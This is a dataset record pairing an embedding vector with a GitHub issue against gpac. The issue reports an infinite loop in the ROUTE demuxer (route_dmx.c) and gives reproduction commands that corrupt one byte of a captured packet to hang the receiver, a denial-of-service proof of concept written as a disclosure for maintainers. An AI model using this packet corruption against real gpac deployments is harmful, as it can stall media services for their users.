-0.00950077548623085, -0.00026849788264371455, -0.010308635421097279, -0.020937049761414528, 0.024824878200888634, 0.004396948963403702, 0.006803699769079685, 0.005810704547911882, -0.0046578203327953815, -0.01017399225383997, 0.002000716980546713, 0.018749093636870384, -0.009340886026620865, -0.013195053674280643, 0.008335268124938011, 0.004611536860466003, 0.031708523631095886, -0.012294625863432884, 0.001638862770050764, 0.001605201861821115, 0.02113901451230049, -0.006972003728151321, -0.007838770747184753, -0.004192879889160395, -0.006185181438922882, 0.028645385056734085, -0.023815052583813667, -0.028342436999082565, -0.03810408338904381, -0.010300220921635628, -0.014869681559503078, -0.0059327250346541405, 0.0029305978678166866, -0.0000356331656803377, -0.018025385215878487, -0.009433453902602196, -0.0006569125689566135, 0.004115039017051458, 0.002236342756077647, 0.005078581161797047, 0.016300266608595848, 0.005667645949870348, -0.008474119007587433, 0.0008436251082457602, 0.007931338623166084, -0.0016504336381331086, 0.004540007561445236, -0.03436772897839546, 0.0170744676142931, 0.02295670099556446, 0.021643927320837975, 0.0042055025696754456, -0.004363287705928087, 0.01093977689743042, -0.010274974629282951, 0.010594752617180347, -0.020280662924051285, -0.0010555832413956523, 0.0035701540764421225, 0.008453081361949444, -0.01451624184846878, 0.024218982085585594, 0.0035091438330709934, 0.009450283832848072, -0.008192209526896477, -0.028359267860651016, -0.013624229468405247, -0.006803699769079685, -0.016115132719278336, -0.009921535849571228, 0.014171218499541283, 0.01549240667372942, 0.0025645361747592688, -0.009340886026620865, 0.0005659230519086123, -0.004104520194232464, 0.008844388648867607, 0.006025292444974184, 0.003256687428802252, -0.010662075132131577, -0.0057980818673968315, 0.005676060914993286, -0.015997320413589478, 0.010914531536400318, -0.0009908913634717464, -0.036387380212545395, -0.01389351673424244, 0.013767288066446781, 0.0035407007671892643, 0.012202058918774128, 0.007115062326192856, -0.007418010383844376, 0.005886441562324762, -0.01078830286860466, 0.021526115015149117, -0.0021837477106601, 0.006214634515345097, -0.006029500160366297, -0.01745315082371235, -0.007460086140781641, 0.0023225988261401653, -0.0017124958103522658, -0.0037531850393861532, -0.012799538671970367, -0.005453058052808046, -0.011343707330524921, 0.002804369665682316, 0.006416599731892347, 0.023024022579193115, 0.0110155139118433, 0.010375957936048508, 0.036993276327848434, -0.008276361972093582, -0.010720981284976006, -0.01587950624525547, -0.0077251652255654335, -0.038642656058073044, -0.028224624693393707, -0.00653441296890378, 0.013523247092962265, 0.03177584335207939, 0.014314277097582817, 0.009828968904912472, -0.0031073172576725483, -0.000028615011615329422, -0.00881072785705328, 0.009551266208291054, -0.03534389287233353, -0.01911936327815056, 0.01024972926825285, 0.02751774713397026, -0.021677589043974876, -0.0042812395840883255, 0.006677471566945314, -0.03271834924817085, 0.015500822104513645, -0.0010035141604021192, 0.01911936327815056, 0.005272130947560072, -0.0013811468379572034, 0.022249823436141014, -0.010586338117718697, 0.004119246732443571, -0.002127996878698468, 0.022249823436141014, 0.000010905261660809629, -0.003870998043566942, -0.008617177605628967, 0.01763828657567501, 0.0028780028223991394, 0.01654430851340294, 0.0015967866638675332, -0.0038941397797316313, -0.002974777715280652, 0.011368952691555023, 0.007998660206794739, -0.012892106547951698, -0.0008530922350473702, 0.008019697852432728, -0.032297588884830475, -0.0304125789552927, -0.007914507761597633, 0.023663578554987907, -0.003103109775111079, 0.010207653045654297, 0.0014537280658259988, 0.00023365364177152514, -0.01684725657105446, -0.005040712654590607, 0.01315297745168209, 0.0062903715297579765, 0.010645244270563126, -0.007813525386154652, -0.004750387743115425, 0.019354989752173424, 0.013397019356489182, -0.014844435267150402, -0.01002251822501421, 0.017554134130477905, -0.005259508267045021, -0.010140331462025642, 0.014903342351317406, -0.01619928516447544, -0.001313825137913227, -0.008878049440681934, 0.000917784171178937, -0.01306882593780756, 0.02218250185251236, 0.02474072575569153, -0.015610219910740852, 0.009315640665590763, -0.01528202649205923, -0.00642080744728446, -0.011857034638524055, -0.018799586221575737, 0.005074373446404934, 0.006807907018810511, 0.022132009267807007, 0.0021627098321914673, 0.004180257208645344, -0.013657890260219574, 0.015248365700244904, -0.03268468752503395, 0.0034144725650548935, -0.016283437609672546, 0.003180950414389372, -0.021963706240057945, -0.0029095597565174103, 0.02189638465642929, -0.002122737467288971, 0.010965022258460522, -0.00030399957904592156, 0.023815052583813667, 0.026087159290909767, 0.0036984861362725496, -0.015399839729070663, 0.01601414941251278, 0.0015515548875555396, 0.0094839446246624, 0.0011602474842220545, 0.0006143105565570295, 0.003355566179379821, -0.0010555832413956523, -0.01170556154102087, -0.007813525386154652, -0.006559658329933882, -0.024218982085585594, -0.01710812747478485, -0.004081378225237131, 0.010754642076790333, -0.006753208581358194, -0.004897654056549072, -0.007224460132420063, 0.005718137137591839, -0.019422311335802078, -0.005293169058859348, 0.006202011834830046, -0.015004324726760387, -0.0064292228780686855, -0.01775609888136387, 0.015315687283873558, -0.007279159035533667, -0.012101076543331146, 0.0006532308761961758, 0.016687367111444473, 0.008760236203670502, 0.008242701180279255, -0.023175496608018875, -0.006117859855294228, 0.0066858865320682526, 0.020314324647188187, -0.020751915872097015, 0.0070224953815341, -0.0016272917855530977, -0.012757462449371815, -0.014979079365730286, -0.0046578203327953815, -0.0007405387586914003, -0.020718254148960114, 0.009702740237116814, -0.0288641806691885, 0.005213224329054356, 0.0004794041742570698, -0.003431302960962057, -0.016148794442415237, 0.0005156947881914675, 0.002890625735744834, -0.016266606748104095, -0.009627003222703934, -0.01040120329707861, 0.03874364122748375, 0.01284161489456892, -0.025784213095903397, -0.018799586221575737, -0.0013411745894700289, -0.015736447647213936, 0.000635348551440984, 0.01351483166217804, 0.035613179206848145, 0.0018050632206723094, -0.03133825212717056, 0.003873101668432355, 0.006727962754666805, 0.00955968163907528, 0.020937049761414528, 0.023579426109790802, -0.00010012788698077202, 0.005141695030033588, -0.021004371345043182, 0.015164213255047798, -0.005196393933147192, -0.013026749715209007, 0.01821052096784115, 0.0033113863319158554, 0.0065259975381195545, -0.0016367589123547077, 0.02825828455388546, 0.017722439020872116, -0.0006143105565570295, 0.005343660246580839, 0.03248272091150284, 0.011915941722691059, 0.0024151660036295652, 0.0010692579671740532, -0.011411028914153576, 0.024269474670290947, -0.015795353800058365, -0.0026444806717336178, -0.02857806347310543, 0.034115273505449295, 0.016249775886535645, -0.007300197146832943, 0.01299308892339468, 0.02869587577879429, -0.0002769131097011268, -0.0023478444200009108, -0.008133303374052048, 0.0012969947420060635, -0.0006111548282206059, 0.007451671175658703, 0.003647994715720415, 0.003502832492813468, -0.0017619351856410503, 0.006349278148263693, -0.029402753338217735, 0.00919782742857933, -0.00214587920345366, 0.00955968163907528, -0.005389943718910217, -0.0009361924603581429, -0.008011282421648502, -0.003317697672173381, 0.015559728257358074, -0.007136100437492132, -0.008301607333123684, -0.01821052096784115, -0.0066269803792238235, -0.00015910012007225305, 0.016131963580846786, 0.002541394205763936, -0.008318438194692135, 0.00023694083211012185, -0.028190962970256805, 0.0008383655804209411, -0.009997272863984108, 0.003948838450014591, -0.015004324726760387, -0.004392741248011589, 0.006105237174779177, -0.015736447647213936, -0.00003458126593613997, -0.017385829240083694, 0.026019837707281113, 0.005108034238219261, 0.016367588192224503, -0.01466771587729454, 0.0021406197920441628, 0.006105237174779177, 0.013413849286735058, -0.016005735844373703, 0.005558248143643141, 0.020398475229740143, -0.00558349397033453, -0.03226392716169357, -0.003803676227107644, 0.0037153165321797132, -0.010375957936048508, 0.008524610660970211, -0.009467114694416523, 0.023764561861753464, -0.011150157079100609, 0.009475530125200748, -0.006143105216324329, -0.006900474429130554, -0.008625593036413193, -0.011646654456853867, -0.003376604290679097, -0.004939729813486338, 0.005002844147384167, -0.0009167322423309088, 0.0034397183917462826, -0.019960885867476463, 0.023983357474207878, 0.00035133512574248016, 0.020937049761414528, 0.010897700674831867, 0.010998683050274849, 0.006972003728151321, 0.03297080472111702, 0.003614333923906088, -0.004699896555393934, -0.005179563537240028, 0.0022889378014951944, -0.009332471527159214, -0.0060841990634799, -0.008566686883568764, -0.014541488140821457, 0.005953763145953417, -0.000009910885637509637, 0.003101005917415023, 0.0012580743059515953, -0.004075066652148962, -0.02312500588595867, -0.0033071786165237427, 0.0032440645154565573, 0.012193643487989902, -0.009803722612559795, 0.004977598320692778, 0.007321235258132219, -0.003237753175199032, -0.010073009878396988, -0.015913167968392372, 0.0008667669026181102, 0.006079991348087788, -0.018126368522644043, -0.007173968944698572, 0.009719571098685265, -0.018261011689901352, 0.017705608159303665, 0.004359080456197262, 0.008604555390775204, -0.016359174624085426, -0.006791076622903347, -0.005848573055118322, 0.00679528433829546, -0.009340886026620865, -0.0024151660036295652, 0.02994132786989212, 0.02337746135890484, 0.03722890093922615, 0.009677494876086712, 0.00005976116153760813, -0.0311362873762846, 0.021475624293088913, 0.007767241448163986, 0.009340886026620865, 0.01763828657567501, -0.007169761229306459, -0.0008262686897069216, 0.03159070760011673, 0.006715340074151754, 0.012059000320732594, -0.011066004633903503, -0.013279206119477749, 0.013237129896879196, -0.0023247026838362217, 0.013363358564674854, 0.0006516530411317945, -0.005457265768200159, -0.011638239026069641, -0.02415166050195694, -0.006648018024861813, -0.011066004633903503, -0.004258097615092993, -0.018176859244704247, 0.008676084689795971, -0.021475624293088913, -0.004598913714289665, -0.016662120819091797, 0.004960767924785614, 0.018277842551469803, 0.019506463780999184, -0.0061304825358092785, 0.0087349908426404, -0.003199884667992592, 0.028325606137514114, -0.02793850749731064, -0.0003479164734017104, 0.006849983241409063, -0.008183794096112251, 0.00043049073428846896, -0.0017661427846178412, 0.0349063016474247, -0.023024022579193115, 0.008238493464887142, 0.004767218139022589, 0.0117644676938653, 0.0027118022553622723, 0.007186591625213623, 0.001788232708349824, -0.015627050772309303, -0.012597573921084404, -0.023613087832927704, -0.01869860291481018, -0.0006469194777309895, -0.001238088239915669, -0.0035385971423238516, 0.012597573921084404, 0.023831883445382118, -0.0002769131097011268, 0.009239903651177883, 0.010157162323594093, 0.014642470516264439, 0.010014103725552559, 0.012109491042792797, -0.0052048093639314175, -0.011789713054895401, 0.007476916536688805, 0.017082883045077324, 0.013035165145993233, 0.0008972720825113356, -0.011528842151165009, 0.006841568276286125, -0.002495110733434558, -0.0018492430681362748, 0.016611630097031593, 0.0007784072076901793, -0.00015896862896624953, -0.006202011834830046, -0.02428630366921425, -0.023747731000185013, -0.0020185993053019047, 0.012984673492610455, -0.001097133383154869, 0.015298857353627682, 0.02081923745572567, -0.001590475207194686, 0.005293169058859348, -0.021307319402694702, -0.010451694019138813, 0.007577899377793074, 0.0045357998460531235, -0.02371406927704811, 0.028460249304771423, -0.0036690328270196915, -0.009753231890499592, -0.02023017220199108, -0.030328426510095596, -0.001784025109373033, 0.007889262400567532, 0.00509541155770421, -0.0035364932846277952, 0.011394198052585125, -0.008238493464887142, -0.0017619351856410503, -0.006143105216324329, 0.011621409095823765, -0.03921489045023918, -0.005911686923354864, 0.014735037460923195, -0.038373369723558426, -0.023916035890579224, 0.018361994996666908, -0.010131916031241417, 0.002225823700428009, -0.004014056641608477, 0.010359127074480057, -0.004918692167848349, 0.03739720582962036, 0.01589633710682392, 0.010131916031241417, -0.010123501531779766, -0.011066004633903503, 0.002410958521068096, -0.021542945876717567, 0.0006700613303110003, 0.004502139054238796, 0.004060340113937855, -0.030816510319709778, -0.000013214514183346182, 0.012883691117167473, -0.003168327733874321, 0.003765807719901204, 0.02463974431157112, 0.0027896431274712086, -0.009921535849571228, -0.020718254148960114, 0.001638862770050764, -0.015854261815547943, -0.0069593810476362705, -0.00808281172066927, 0.014314277097582817, 0.005642400123178959, -0.021778570488095284, 0.008284777402877808, -0.026339616626501083, 0.005347867961972952, -0.001238088239915669, -0.006547035649418831, 0.004666235763579607, -0.006012669764459133, -0.013195053674280643, -0.0019481218187138438, -0.02627229504287243, -0.0004925529356114566, -0.0440620556473732, -0.0017955960938706994, -0.010763057507574558, -0.02021334134042263, -0.023629918694496155, 0.0048555778339505196, -0.012210474349558353, 0.0003821032587438822, -0.001924979966133833, 0.0008546700701117516, 0.002566640032455325, -0.0155681436881423, 0.009904705919325352, -0.003119940171018243, -0.02566639892756939, 0.004699896555393934, -0.022300314158201218, -0.0005143798771314323, -0.001209686859510839, -0.0032230266369879246, -0.001694613485597074, 0.0008057566592469811, -0.0030673451256006956, 0.025868363678455353, -0.005747590214014053, -0.004674650728702545, 0.004220229107886553, -0.008263738825917244, 0.0042623053304851055, -0.005827534943819046, -0.0002552176301833242, -0.01412914227694273, 0.0006479714065790176, 0.030008649453520775, 0.025026842951774597, -0.014465751126408577, -0.010653659701347351, 0.011857034638524055, 0.002339429222047329, -0.00513328006491065, -0.012286210432648659, -0.004384325817227364, 0.003111524973064661, 0.004117142874747515, -0.0075652762316167355, -0.015921583399176598, 0.00888646487146616, -0.02066776342689991, 0.014979079365730286, 0.011562502942979336, -0.006037915125489235, 0.005373113323003054, -0.0033198015298694372, 0.021492453292012215, 0.014777113683521748, -0.0008241648902185261, 0.000494130770675838, -0.019085703417658806, -0.02325964905321598, 0.03823872655630112, -0.0008346839458681643, 0.031052134931087494, -0.007678881753236055, -0.019960885867476463, -0.009551266208291054, 0.00224055047146976, 0.006256710737943649, 0.005764421075582504, -0.03847435489296913, -0.0054614730179309845, -0.004964975640177727, -0.0008373137097805738, -0.009980442933738232, 0.017587795853614807, -0.012008508667349815, -0.014962248504161835, -0.028157303109765053, 0.012715387158095837, -0.013674721121788025, 0.015425085090100765, 0.02600300870835781, -0.010367542505264282, 0.0091136759147048, -0.022990360856056213, 0.014196463860571384, -0.0031451857648789883, 0.020011376589536667, 0.0006195700261741877, 0.010519016534090042, -0.005840157624334097, -0.004409571643918753, 0.008133303374052048, 0.0030715526081621647, -0.008301607333123684, 0.020852897316217422, 0.0030000233091413975, 0.0038752055261284113, 0.0023289101663976908, -0.015887921676039696, -0.000163570701261051, 0.010232899338006973, 0.004266513045877218, -0.015130552463233471, -0.012892106547951698, -0.02751774713397026, -0.001274904701858759, -0.0034607562702149153, -0.02341112308204174, 0.0008026009309105575, -0.0018334644846618176, 0.01055267732590437, -0.004544214811176062, 0.0009524968918412924, 0.000809964258223772, -0.003328216727823019, 0.013565323315560818, -0.009138921275734901, 0.0023247026838362217, -0.012858445756137371, -0.016081470996141434, -0.009526020847260952, -0.01898472011089325, 0.018176859244704247, 0.0007805110071785748, -0.007136100437492132, -0.0021080109290778637, 0.0017156514804810286, 0.005267923232167959, -0.014474166557192802, 0.0023794013541191816, -0.0024151660036295652, -0.011798128485679626, -0.013009918853640556, -0.004363287705928087, 0.014735037460923195, -0.005743382964283228, -0.006214634515345097, 0.007359103765338659, -0.006845775526016951, 0.004628367256373167, 0.004548422526568174, 0.002038585254922509, 0.023596256971359253, -0.0033681888598948717, -0.008057566359639168, 0.001624136115424335, 0.0015599700855091214, -0.006904682144522667, 0.006025292444974184, -0.007994452491402626, -0.009332471527159214, 0.005709722172468901, -0.0019407584331929684, 0.015483992174267769, 0.005217432044446468, -0.023175496608018875, -0.011697146110236645, -0.01541666965931654, -0.02004503645002842, -0.016249775886535645, -0.0042812395840883255, 0.0018944748444482684, -0.01853029802441597, 0.010973437689244747, -0.026103990152478218, 0.0189678892493248, 0.00653441296890378, -0.00748533196747303, -0.013422264717519283, 0.01762145571410656, -0.0001910516293719411, 0.000022977475964580663, 0.01839565485715866, 0.011318461038172245, 0.030446240678429604, -0.010409618727862835, -0.009206242859363556, -0.002941116923466325, -0.007767241448163986, 0.0052426778711378574, -0.006223049946129322, -0.008166964165866375, -0.006433430127799511, -0.003122044028714299, -0.008570894598960876, 0.00846149679273367, -0.008238493464887142, -0.004678858444094658, 0.01760462485253811, 0.01762145571410656, -0.0001805326173780486, -0.009795308113098145, 0.005309999454766512, 0.018782755360007286, 0.005453058052808046, -0.00351124769076705, 0.02250227890908718, 0.0077041275799274445, 0.022418126463890076, 0.020735085010528564, -0.007821940816938877, -0.005230054724961519, 0.014608809724450111, -0.003328216727823019, -0.0036795518826693296, 0.006677471566945314, -0.016443325206637383, -0.023057684302330017, -0.005861195735633373, 0.01019082311540842, -0.01959061622619629, -0.012370362877845764, 0.011343707330524921, 0.01520628947764635, 0.010779887437820435, 0.002747566904872656, -0.005040712654590607, 0.001289631356485188, -0.01541666965931654, 0.011680315248668194, -0.0023878165520727634, -0.019338158890604973, 0.013464340940117836, -0.003826817963272333, -0.012235719710588455, 0.01222730427980423, -0.0068331528455019, 0.027433594688773155, 0.0029852967709302902, 0.022232992574572563, -0.0030252691358327866, -0.015618635341525078, -0.025498095899820328, 0.002589781768620014, 0.004251786507666111, 0.0006700613303110003, -0.0006127326632849872, -0.014196463860571384, 0.010106670670211315, 0.01389351673424244, -0.011756052263081074, -0.003021061420440674, -0.004986013751477003, 0.018799586221575737, 0.006866813637316227, 0.005503549240529537, -0.011141741648316383, 0.006471298635005951, 0.005339452531188726, 0.00543201994150877, -0.007253913674503565, 0.017974894493818283, -0.01230304129421711, -0.02400018647313118, 0.004298069979995489, -0.01991039328277111, 0.01140261348336935, -0.03157388046383858, -0.007662051357328892, -0.018008556216955185, 0.007291782181710005, 0.01765511743724346, 0.0014179634163156152, -0.004216021858155727, -0.007102439645677805, 0.005541417747735977, 0.005255300551652908, -0.010005688294768333, 0.02368040941655636, 0.02187955379486084, 0.004230748396366835, -0.01543350052088499, 0.0013159288791939616, 0.0011087042512372136, -0.002945324406027794, 0.02038164623081684, 0.020566780120134354, 0.01019082311540842, -0.028628554195165634, -0.00429175840690732, -0.016510648652911186, 0.006037915125489235, 0.005554040428251028, 0.02415166050195694, -0.0012664895039051771, 0.0025245638098567724, -0.0010981853120028973, 0.01959061622619629, -0.029453245922923088, -0.010519016534090042, -0.01991039328277111, 0.006542827934026718, -0.00339764216914773, -0.014381598681211472, 0.0029768815729767084, -0.005852780770510435, 0.017554134130477905, -0.011141741648316383, 0.012984673492610455, -0.014314277097582817, -0.01017399225383997, -0.004396948963403702, 0.015223120339214802, 0.007960791699588299, 0.013826195150613785, 0.00770833482965827, 0.030580883845686913, 0.004838747438043356, -0.015248365700244904, -0.00812068022787571, -0.005739175248891115, -0.0035322855692356825, 0.005743382964283228, 0.0011886488646268845, -0.011781297624111176, -0.007518992759287357, 0.016603214666247368, -0.005297376308590174, -0.0004504768585320562, -0.003338735783472657, 0.009584927931427956, 0.0069215125404298306, -0.002913767471909523, 0.004885030910372734, -0.004146595951169729, -0.0033723965752869844, 0.013691551052033901, -0.0030105423647910357, -0.01648540236055851, 0.0012212577275931835, -0.007106647361069918, 0.0008383655804209411, 0.00038894062163308263, 0.01549240667372942, 0.017066052183508873, -0.009248319081962109, -0.005023882258683443, -0.013952422887086868, -0.00834789127111435, -0.01760462485253811, 0.011023929342627525, -0.008112264797091484, 0.006096821743994951, -0.00827215425670147, -0.0078009022399783134, 0.00838575977832079, 0.023764561861753464, 0.017991725355386734, -0.02812364138662815, -0.0166957825422287, 0.018361994996666908, 0.028190962970256805, 0.012664895504713058, 0.002842238172888756, 0.00850777979940176, 0.004409571643918753, -0.004024575464427471, 0.014339522458612919, 0.006589111872017384, -0.016704197973012924, -0.0030841755215078592, -0.004020367749035358, -0.010451694019138813, 0.002000716980546713, -0.010367542505264282, 0.003233545459806919, 0.016586383804678917, 0.019523294642567635, -0.001995457336306572, -0.0011665589408949018, 0.037329886108636856, -0.006555451080203056, -0.013649475760757923, -0.019354989752173424, 0.004788256250321865, -0.0038962436374276876, -0.02341112308204174, -0.003898347495123744, -0.015854261815547943, -0.02083606645464897, -0.008049150928854942, -0.019506463780999184, -0.003376604290679097, 0.012412439100444317, 0.004653612617403269, 0.0028212000615894794, 0.002132204594090581, 0.014911756850779057, 0.024521930143237114, -0.009685910306870937, -0.002665518783032894, -0.00791030004620552, -0.0033303205855190754, -0.002766501158475876, -0.002743359422311187, 0.00865083932876587, -0.009433453902602196, 0.0006879436550661922, -0.006513374857604504, 0.015660710632801056, 0.011284800246357918, -0.018782755360007286, 0.007064571138471365, 0.002118529751896858, 0.0028169925790280104, 0.007211837451905012, 0.0190015509724617, -0.004264409188181162, 0.016451740637421608, 0.006164143327623606, -0.007914507761597633, 0.011394198052585125, -0.00612206757068634, 0.02475755661725998, 0.010880870744585991, 0.006315617356449366, 0.030294766649603844, -0.006185181438922882, -0.0016840944299474359, 0.017991725355386734, 0.012420854531228542, 0.00045126580516807735, 0.017958063632249832, 0.042513657361269, -0.0006432378431782126, -0.012185228057205677, -0.011890695430338383, 0.0030168539378792048, 0.019708428531885147, 0.008777067065238953, 0.014457335695624352, -0.0010813549160957336, 0.020634101703763008, -0.010157162323594093, -0.008802312426269054, -0.01762145571410656, 0.014482581056654453, 0.013725211843848228, -0.016897747293114662, -0.02428630366921425, -0.006892059464007616, -0.0020070283208042383, 0.013885101303458214, -0.003557531163096428, -0.004247578792273998, -0.009761647321283817, 0.005617154762148857, 0.012412439100444317, 0.0012664895039051771, 0.018294673413038254, 0.03007597103714943, -0.00994678121060133, -0.006471298635005951, -0.01284161489456892, -0.0027412555646151304, 0.012025339528918266, -0.013876685872673988, -0.007607352454215288, -0.0020396371837705374, 0.008448873646557331, 0.011242724023759365, -0.019186684861779213, -0.010258144699037075, -0.010965022258460522, -0.005650815553963184, 0.004131869412958622, 0.00865925382822752, -0.0013969253050163388, -0.020549949258565903, -0.020869728177785873, -0.01790757291018963, -0.0072328755632042885, -0.014036575332283974, 0.012412439100444317, 0.014490996487438679, -0.01642649620771408, -0.007729372940957546, -0.03056405298411846, -0.007186591625213623, 0.007249705959111452, -0.00196810788474977, 0.00339764216914773, -0.028073150664567947, 0.00934930145740509, 0.010056179016828537, -0.005331037566065788, -0.004977598320692778, 0.001416911487467587, 0.012833199463784695, 0.0014747660607099533, 0.029066145420074463, -0.013952422887086868, 0.007699919864535332, 0.004502139054238796, 0.0015694372123107314, 0.0007941857329569757, -0.018462976440787315, 0.007481124252080917, -0.011520426720380783, -0.002083817031234503, 0.012294625863432884, -0.014188049361109734, 0.01215156726539135, 0.012799538671970367, -0.005974801257252693, -0.009265149012207985, -0.008469912223517895, -0.03877730295062065, 0.018109537661075592, 0.002905352273955941, -0.004098208621144295, 0.023478444665670395, 0.0029074561316519976, -0.003515455173328519, 0.00531841441988945, -0.012858445756137371, 0.006980419158935547, -0.01927083730697632, 0.012976258061826229, -0.002392024267464876, -0.016174038872122765, -0.0008778119226917624, 0.02568322978913784, 0.006711132358759642, 0.01627502217888832, 0.017570964992046356, 0.004354872740805149, -0.013851440511643887, -0.030496731400489807, -0.0031451857648789883, -0.03223026543855667, 0.007279159035533667, 0.008411005139350891, 0.010880870744585991, -0.03901292756199837, 0.0015473472885787487, 0.014541488140821457, 0.017537303268909454, -0.017419490963220596, 0.0010545313125476241, 0.03204512968659401, -0.005676060914993286, 0.013960838317871094, 0.006706924643367529, 0.002122737467288971, 0.014793944545090199, 0.009239903651177883, -0.009214658290147781, -0.013009918853640556, 0.012715387158095837, 0.029049314558506012, 0.006185181438922882, -0.0014232228277251124, 0.0004980753874406219, 0.02689502015709877, 0.007077194284647703, -0.013329696841537952, -0.0074685015715658665, -0.0003163594228681177, -0.005347867961972952, 0.007935545407235622, 0.003788949688896537, 0.00018000666750594974, -0.010005688294768333, 0.011209063231945038, -0.0047335573472082615, -0.005137487314641476, 0.0036606176290661097, 0.015593389980494976, -0.002354155760258436, -0.0030841755215078592, -0.0008809675928205252, 0.0032019885256886482, -0.004977598320692778, 0.002593989484012127, 0.010796718299388885, 0.06725437939167023, 0.01389351673424244, -0.014861266128718853, 0.00858351681381464, 0.0036185416392982006, 0.01109966542571783, 0.0029284940101206303, -0.005192186217755079, -0.027012834325432777, -0.03196097910404205, 0.009164166636765003, 0.006248295772820711, -0.007001457270234823, -0.004022471606731415, -0.01201692409813404, 0.002962155034765601, -0.002814888721331954, 0.012589158490300179, -0.019960885867476463, -0.00838575977832079, 0.022721074521541595, 0.010981853120028973, 0.01869860291481018, 0.010216068476438522, -0.0009314588969573379, -0.00027270548162050545, -0.009669079445302486, -0.0020207029301673174, 0.015004324726760387, -0.010653659701347351, 0.03931587561964989, -0.009618588723242283, 0.008676084689795971, 0.005415189545601606, 0.00963541865348816, 0.024505099281668663, -0.0036690328270196915, 0.017023975029587746, -0.0009814242366701365, -0.014634055085480213, 0.00404982129111886, 0.0017398452619090676, 0.005284753628075123, 0.01745315082371235, -0.007001457270234823, 0.01991039328277111, -0.023444782942533493, 0.006075783632695675, 0.023007191717624664, 0.005474096164107323, -0.00048124499153345823, -0.004342250060290098, -0.001421119086444378, 0.0021216855384409428, 0.00573075981810689, 0.013110902160406113, -0.002945324406027794, -0.014735037460923195, -0.0028548610862344503, 0.0064039770513772964, 0.020095529034733772, -0.01451624184846878, 0.010350711643695831, 0.007943960838019848, -0.021812232211232185, 0.018513469025492668, 0.006643810775130987, 0.00918941292911768, 0.005259508267045021, 0.019792580977082253, -0.007081401534378529, -0.003957253880798817, -0.007712542545050383, 0.00020709313685074449, -0.0022300314158201218, -0.04355714097619057, 0.003073656465858221, -0.016662120819091797, -0.012622819282114506, 0.011310046538710594, 0.010678905062377453, 0.006218842230737209, -0.005726552568376064, -0.014255370944738388, -0.020903388038277626, -0.009677494876086712, -0.018765924498438835, 0.0048555778339505196, -0.00216481345705688, 0.012757462449371815, 0.027618728578090668, 0.01989356242120266, -0.00638293894007802, -0.007767241448163986, 0.0008131199283525348, 0.00694675836712122, -0.0033029711339622736, 0.013338112272322178, 0.009795308113098145, 0.02386554330587387, 0.0052426778711378574, 0.013312866911292076, -0.014448920264840126, 0.017537303268909454, -0.006584904156625271, 0.013312866911292076, -0.011503595858812332, -0.025750551372766495, 0.00026613110094331205, 0.006555451080203056, 0.011781297624111176, 0.007241290528327227, 0.00432962691411376, -0.01017399225383997, 0.012437684461474419, 0.006807907018810511, 0.00007553968316642568, 0.0057980818673968315, 0.017890742048621178, 0.002104855142533779, -0.010434864088892937, 0.006828945130109787, 0.020314324647188187, -0.006138897966593504, 0.00027191656408831477, 0.020465798676013947, 0.022266654297709465, 0.020886559039354324, 0.033644020557403564, 0.014137557707726955, -0.0013432783307507634, -0.01009825523942709, 0.005314207170158625, -0.0032819330226629972, 0.006462883669883013, 0.026070330291986465, 0.011932771652936935, 0.02231714501976967, 0.014087066054344177, 0.011225894093513489, -0.016401249915361404, 0.019523294642567635, -0.01017399225383997, -0.00307996803894639, -0.024269474670290947, -0.0025582248345017433, -0.0091136759147048, -0.007182384375482798, -0.01443209033459425, -0.02293987013399601, 0.04089793562889099, 0.03982078656554222, 0.003624852979555726, 0.008625593036413193, -0.015871090814471245, 0.026676224544644356, -0.002448827028274536, 0.019220346584916115, 0.04456696659326553, -0.0024446193128824234, -0.0026423768140375614, -0.008091227151453495, -0.0023562596179544926, 0.0017587795155122876, -0.003555427538231015, 0.0010718877892941236, 0.02612082101404667, -0.011108080856502056, -0.0046704430133104324, -0.002823303919285536, -0.011217478662729263, -0.026827698573470116, -0.013388603925704956, -0.014634055085480213, 0.02522880770266056, 0.022098349407315254, 0.013523247092962265, -0.028039488941431046, 0.016190869733691216, 0.0053015840239822865, -0.008432043716311455, 0.013725211843848228, -0.008709745481610298, 0.005928517319262028, 0.016889331862330437, -0.004009848926216364, -0.0027559823356568813, -0.026491090655326843, -0.0011560398852452636, 0.008141718804836273, 0.01056109182536602, -0.009610173292458057, 0.007262328639626503, -0.021054862067103386, -0.005495133809745312, -0.0057349675334990025, 0.005953763145953417, 0.0003371344646438956, 0.01701555959880352, 0.007922923192381859, 0.012505006045103073, -0.015021154657006264, 0.009071599692106247, 0.012286210432648659 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
https://github.com/gpac/gpac/blob/7aef8038c6bdd310e65000704e39afaa0e721048/src/media_tools/route_dmx.c#L1454 In this `else` block, the variable `payload`, which is involved in the `while` condition, is not updated. Consequently, we are stuck in an infinite while loop. ### Reproduction Scenario 1. The file used in this test: https://github.com/gpac/gpac/assets/27826148/87c1287b-04a2-4bdb-8023-2256ff9d221d 2. Generating dash session: ``` gpac -i short.mp4 -o dash_session/live.mpd ``` 3. Sending segments via ROUTE ``` gpac -i dash_session/live.mpd dashin:forward=mani -o route://234.1.1.1:1234/live.mpd -netcap=dst=route.gpc ``` 4. Receiving the segments while patching the 13th byte of the first packet. ``` gpac -i route://234.1.1.1:1234/live.mpd -netcap=src=route.gpc,nrt,[s=1,o=12,v=0] inspect ``` ### Result: ![image](https://github.com/gpac/gpac/assets/27826148/4f0c41e2-8428-486e-9666-4bf880349a0f)
Endless While Loop Due to Unupdated Variable in `else` Block
https://api.github.com/repos/gpac/gpac/issues/2717/comments
1
2024-01-08T15:42:20
2024-01-10T16:57:48Z
https://github.com/gpac/gpac/issues/2717
2,070,717,442
2,717
false
This is a GitHub Issue repo:gpac owner:gpac Title : Endless While Loop Due to Unupdated Variable in `else` Block Issue date: --- start body --- https://github.com/gpac/gpac/blob/7aef8038c6bdd310e65000704e39afaa0e721048/src/media_tools/route_dmx.c#L1454 In this `else` block, the variable `payload`, which is involved in the `while` condition, is not updated. Consequently, we are stuck in an infinite while loop. ### Reproduction Scenario 1. The file used in this test: https://github.com/gpac/gpac/assets/27826148/87c1287b-04a2-4bdb-8023-2256ff9d221d 2. Generating dash session: ``` gpac -i short.mp4 -o dash_session/live.mpd ``` 3. Sending segments via ROUTE ``` gpac -i dash_session/live.mpd dashin:forward=mani -o route://234.1.1.1:1234/live.mpd -netcap=dst=route.gpc ``` 4. Receiving the segments while patching the 13th byte of the first packet. ``` gpac -i route://234.1.1.1:1234/live.mpd -netcap=src=route.gpc,nrt,[s=1,o=12,v=0] inspect ``` ### Result: ![image](https://github.com/gpac/gpac/assets/27826148/4f0c41e2-8428-486e-9666-4bf880349a0f) --- end body ---
